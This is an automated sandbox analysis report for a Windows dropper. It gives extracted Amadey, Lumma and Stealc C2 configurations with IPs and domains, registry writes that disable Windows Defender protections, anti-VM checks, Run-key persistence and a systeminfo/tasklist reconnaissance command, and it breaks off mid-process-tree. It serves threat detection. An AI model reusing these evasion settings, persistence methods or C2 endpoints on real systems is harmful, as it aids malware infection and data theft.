Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2024 16:14
Static task
static1
General
-
Target
d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe
-
Size
7.0MB
-
MD5
efa400b9a0279efb4a784a071031ea30
-
SHA1
f94215b10040f2c4ef352273e94e2173de708c8b
-
SHA256
d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed
-
SHA512
83bd505d7a121cb98c05b09fa102e0e15dff10bd135ca2d1d9289095e30425b041615d2ae13fcdf41aa0809f9bed8799897574e4eb24133e87778138efc0bd41
-
SSDEEP
98304:eIfgMaIDhyxjMQyaAyaWwCYmAwNQko9vAxdgRCsGEm5zCv5EdPLzichkijAFIPdH:HPaIDHQzaXCYCoIxkmIhmPvPsIPC/3h
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://tacitglibbr.biz/api
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://drive-connect.cyou/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tacitglibbr.biz/api
https://immureprech.biz/api
https://deafeninggeh.biz/api
https://effecterectz.xyz/api
https://diffuculttan.xyz/api
https://debonairnukk.xyz/api
https://wrathful-jammy.cyou/api
https://awake-weaves.cyou/api
https://sordid-snaked.cyou/api
https://drive-connect.cyou/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4f675h.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1e2a9f4dd4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1e2a9f4dd4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4f675h.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4f675h.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4f675h.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4f675h.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1e2a9f4dd4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1e2a9f4dd4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1e2a9f4dd4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4f675h.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2G5656.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e05g.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4f675h.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 81320a396c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0da45764eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e2a9f4dd4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8acb171f29.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1F16f1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2G5656.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1F16f1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2G5656.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4f675h.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 81320a396c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0da45764eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8acb171f29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8acb171f29.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4f675h.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 81320a396c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1F16f1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e05g.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e05g.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0da45764eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e2a9f4dd4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e2a9f4dd4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 1F16f1.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe -
Executes dropped EXE 19 IoCs
pid Process 2936 h6n02.exe 4400 D8c88.exe 1100 1F16f1.exe 3020 skotes.exe 3064 2G5656.exe 4648 M5iFR20.exe 3500 3e05g.exe 4900 4f675h.exe 4784 646bc9d341.exe 752 646bc9d341.exe 312 81320a396c.exe 5024 0da45764eb.exe 4048 skotes.exe 1920 57a033a9a4.exe 3956 1e2a9f4dd4.exe 3236 9fadc6f806.exe 4980 8acb171f29.exe 6124 skotes.exe 6792 skotes.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 1F16f1.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 0da45764eb.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 2G5656.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 3e05g.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 4f675h.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 81320a396c.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 1e2a9f4dd4.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 8acb171f29.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1e2a9f4dd4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4f675h.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4f675h.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" h6n02.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" D8c88.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\81320a396c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014089001\\81320a396c.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0da45764eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014090001\\0da45764eb.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\57a033a9a4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014091001\\57a033a9a4.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1e2a9f4dd4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014092001\\1e2a9f4dd4.exe" skotes.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023c4e-44.dat autoit_exe behavioral1/files/0x0007000000023c61-147.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2912 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 1100 1F16f1.exe 3020 skotes.exe 3064 2G5656.exe 3500 3e05g.exe 4900 4f675h.exe 312 81320a396c.exe 5024 0da45764eb.exe 4048 skotes.exe 3956 1e2a9f4dd4.exe 4980 8acb171f29.exe 6124 skotes.exe 6792 skotes.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4784 set thread context of 752 4784 646bc9d341.exe 102 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1F16f1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6020 4980 WerFault.exe 138 -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language h6n02.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 81320a396c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 57a033a9a4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0da45764eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 57a033a9a4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 57a033a9a4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9fadc6f806.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f675h.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e05g.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1F16f1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2G5656.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M5iFR20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 646bc9d341.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language D8c88.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 646bc9d341.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e2a9f4dd4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8acb171f29.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3356 systeminfo.exe -
Kills process with taskkill 5 IoCs
pid Process 2396 taskkill.exe 3424 taskkill.exe 2556 taskkill.exe 1484 taskkill.exe 2232 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 1100 1F16f1.exe 1100 1F16f1.exe 3020 skotes.exe 3020 skotes.exe 3064 2G5656.exe 3064 2G5656.exe 3500 3e05g.exe 3500 3e05g.exe 4900 4f675h.exe 4900 4f675h.exe 4900 4f675h.exe 4900 4f675h.exe 312 81320a396c.exe 312 81320a396c.exe 5024 0da45764eb.exe 5024 0da45764eb.exe 4048 skotes.exe 4048 skotes.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 3956 1e2a9f4dd4.exe 3956 1e2a9f4dd4.exe 3956 1e2a9f4dd4.exe 3956 1e2a9f4dd4.exe 3956 1e2a9f4dd4.exe 4980 8acb171f29.exe 4980 8acb171f29.exe 6124 skotes.exe 6124 skotes.exe 6792 skotes.exe 6792 skotes.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2912 tasklist.exe Token: SeDebugPrivilege 4900 4f675h.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 3424 taskkill.exe Token: SeDebugPrivilege 2556 taskkill.exe Token: SeDebugPrivilege 1484 taskkill.exe Token: SeDebugPrivilege 1352 firefox.exe Token: SeDebugPrivilege 1352 firefox.exe Token: SeDebugPrivilege 3956 1e2a9f4dd4.exe Token: SeDebugPrivilege 1352 firefox.exe Token: SeDebugPrivilege 1352 firefox.exe Token: SeDebugPrivilege 1352 firefox.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 1100 1F16f1.exe 4648 M5iFR20.exe 4648 M5iFR20.exe 4648 M5iFR20.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 4648 M5iFR20.exe 4648 M5iFR20.exe 4648 M5iFR20.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1352 firefox.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe 1920 57a033a9a4.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1352 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5008 wrote to memory of 2936 5008 d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe 82 PID 5008 wrote to memory of 2936 5008 d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe 82 PID 5008 wrote to memory of 2936 5008 d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe 82 PID 2936 wrote to memory of 4400 2936 h6n02.exe 83 PID 2936 wrote to memory of 4400 2936 h6n02.exe 83 PID 2936 wrote to memory of 4400 2936 h6n02.exe 83 PID 4400 wrote to memory of 1100 4400 D8c88.exe 84 PID 4400 wrote to memory of 1100 4400 D8c88.exe 84 PID 4400 wrote to memory of 1100 4400 D8c88.exe 84 PID 1100 wrote to memory of 3020 1100 1F16f1.exe 85 PID 1100 wrote to memory of 3020 1100 1F16f1.exe 85 PID 1100 wrote to memory of 3020 1100 1F16f1.exe 85 PID 4400 wrote to memory of 3064 4400 D8c88.exe 86 PID 4400 wrote to memory of 3064 4400 D8c88.exe 86 PID 4400 wrote to memory of 3064 4400 D8c88.exe 86 PID 3020 wrote to memory of 4648 3020 skotes.exe 87 PID 3020 wrote to memory of 4648 3020 skotes.exe 87 PID 3020 wrote to memory of 4648 3020 skotes.exe 87 PID 4648 wrote to memory of 4244 4648 M5iFR20.exe 88 PID 4648 wrote to memory of 4244 4648 M5iFR20.exe 88 PID 4648 wrote to memory of 4244 4648 M5iFR20.exe 88 PID 4244 wrote to memory of 3356 4244 cmd.exe 90 PID 4244 wrote to memory of 3356 4244 cmd.exe 90 PID 4244 wrote to memory of 3356 4244 cmd.exe 90 PID 2936 wrote to memory of 3500 2936 h6n02.exe 92 PID 2936 wrote to memory of 3500 2936 h6n02.exe 92 PID 2936 wrote to memory of 3500 2936 h6n02.exe 92 PID 5008 wrote to memory of 4900 5008 d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe 94 PID 5008 wrote to memory of 4900 5008 d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe 94 PID 5008 wrote to memory of 4900 5008 d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe 94 PID 3020 wrote to memory of 4784 3020 skotes.exe 95 PID 3020 wrote to memory of 4784 3020 skotes.exe 95 PID 3020 wrote to memory of 4784 3020 skotes.exe 95 PID 4244 wrote to memory of 2912 4244 cmd.exe 97 PID 4244 wrote to memory of 2912 4244 cmd.exe 97 PID 4244 wrote to memory of 2912 4244 cmd.exe 97 PID 4648 wrote to memory of 4916 4648 M5iFR20.exe 98 PID 4648 wrote to memory of 4916 4648 M5iFR20.exe 98 PID 4648 wrote to memory of 4916 4648 M5iFR20.exe 98 PID 4648 wrote to memory of 4016 4648 M5iFR20.exe 100 PID 4648 wrote to memory of 4016 4648 M5iFR20.exe 100 PID 4648 wrote to memory of 4016 4648 M5iFR20.exe 100 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4784 wrote to memory of 752 4784 646bc9d341.exe 102 PID 4648 wrote to memory of 2712 4648 M5iFR20.exe 103 PID 4648 wrote to memory of 2712 4648 M5iFR20.exe 103 PID 4648 wrote to memory of 2712 4648 M5iFR20.exe 103 PID 4648 wrote to memory of 1488 4648 M5iFR20.exe 104 PID 4648 wrote to memory of 1488 4648 M5iFR20.exe 104 PID 4648 wrote to memory of 1488 4648 M5iFR20.exe 104 PID 4648 wrote to memory of 3616 4648 M5iFR20.exe 107 PID 4648 wrote to memory of 3616 4648 M5iFR20.exe 107 PID 4648 wrote to memory of 3616 4648 M5iFR20.exe 107 PID 4648 wrote to memory of 2672 4648 M5iFR20.exe 109 PID 4648 wrote to memory of 2672 4648 M5iFR20.exe 109 PID 4648 wrote to memory of 2672 4648 M5iFR20.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe"C:\Users\Admin\AppData\Local\Temp\d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h6n02.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h6n02.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\D8c88.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\D8c88.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1F16f1.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1F16f1.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo8⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:3356
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
